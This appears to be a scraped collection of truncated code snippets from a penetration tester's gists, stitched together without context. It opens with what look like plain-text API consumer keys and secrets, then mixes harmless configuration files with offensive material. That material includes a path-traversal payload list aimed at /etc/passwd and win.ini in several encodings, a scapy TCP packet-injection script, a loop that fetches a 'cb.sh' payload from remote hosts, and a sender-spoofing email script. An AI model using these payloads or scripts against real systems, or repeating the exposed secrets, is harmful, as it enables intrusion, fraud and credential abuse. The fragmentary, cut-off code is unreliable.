type: PIN
Consumer key: 3nVuSoBZnx6U4vzUxf5w
Consumer secret: Bcs59EFbbsdF6Sl9Ng71smgStWEGwXXKSjYvPVt7qys
type: PIN
Consumer key: IQKbtAYlXLripLGPWd0HUA
[DISASM] | |
000000 // | |
aaaaaa //Default color | |
f3c5ff //Regular comment | |
7e6082 //Repeatable comment | |
7faa55 //Automatic comment | |
ffffff //Instruction | |
b9ebeb //Dummy Data Name | |
b9ebeb //Regular Data Name | |
bbecff //Demangled Name |
#!/usr/bin/env python | |
# Ref: https://stackoverflow.com/questions/287871/print-in-terminal-with-colors | |
class bcolors: | |
HEADER = '\033[95m' | |
OKBLUE = '\033[94m' | |
OKGREEN = '\033[92m' | |
WARNING = '\033[93m' | |
FAIL = '\033[91m' |
# Author: samduy@github | |
# Clear the screen after exiting Vim | |
altscreen on | |
# using mouse to select region | |
# turning this on will lose the normal mouse control like select/copy/paste | |
#mousetrack on | |
# turn off welcome message |
../../../../../../../../../../../../etc/passwd | |
../../../../../../../../../../../../windows/win.ini | |
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd | |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc/passwd | |
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd | |
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5cwin.ini | |
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252fetc/passwd | |
%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2f%252e%252e%2fetc/passwd | |
%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252f%2e%2e%252fetc/passwd | |
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cetc/passwd |
import binascii, sys, string | |
dataFormatHex = binascii.a2b_hex(sys.argv[1]) | |
output = "" | |
for char in dataFormatHex: | |
if char in string.printable: output += char | |
else: output += "." | |
print "\n" + output |
from scapy.all import * | |
# Add iptables rule to block attack box from sending RSTs | |
# Create web.txt with entire GET/POST packet data | |
fileweb = open("web.txt",'r') | |
data = fileweb.read() | |
ip = IP(dst="<ip>") | |
SYN=ip/TCP(rport=RandNum(6000,7000),dport=80,flags="S",seq=4) | |
SYNACK = sr1(SYN) | |
ACK=ip/TCP(sport=SYNACK.dport,dport=80,flags="A",seq=SYNACK.ack,ack=SYNACK.seq+1)/data | |
reply,error = sr(ACK) |
#!/usr/bin/python | |
import urllib2, os | |
urls = ["1.1.1.1","2.2.2.2"] | |
port = "80" | |
payload = "cb.sh" | |
for url in urls: | |
u = "http://%s:%s/%s" % (url, port, payload) | |
try: |
#!/usr/bin/python | |
import smtplib, string | |
import os, time | |
os.system("/etc/init.d/sendmail start") | |
time.sleep(4) | |
HOST = "localhost" | |
SUBJECT = "Email from spoofed sender" | |
TO = "[email protected]" |
# Create SSL cert (follow prompts for customization) | |
# > openssl req -new -x509 -keyout cert.pem -out cert.pem -days 365 -nodes | |
# Create httpserver.py | |
import BaseHTTPServer,SimpleHTTPServer,ssl | |
cert = "cert.pem" | |
httpd = BaseHTTPServer.HTTPServer(('192.168.1.10',443),SimpleHTTPServer.SimpleHTTPRequestHandler) | |
httpd.socket = ssl.wrap_socket(httpd.socket,certfile=cert,server_side=True) |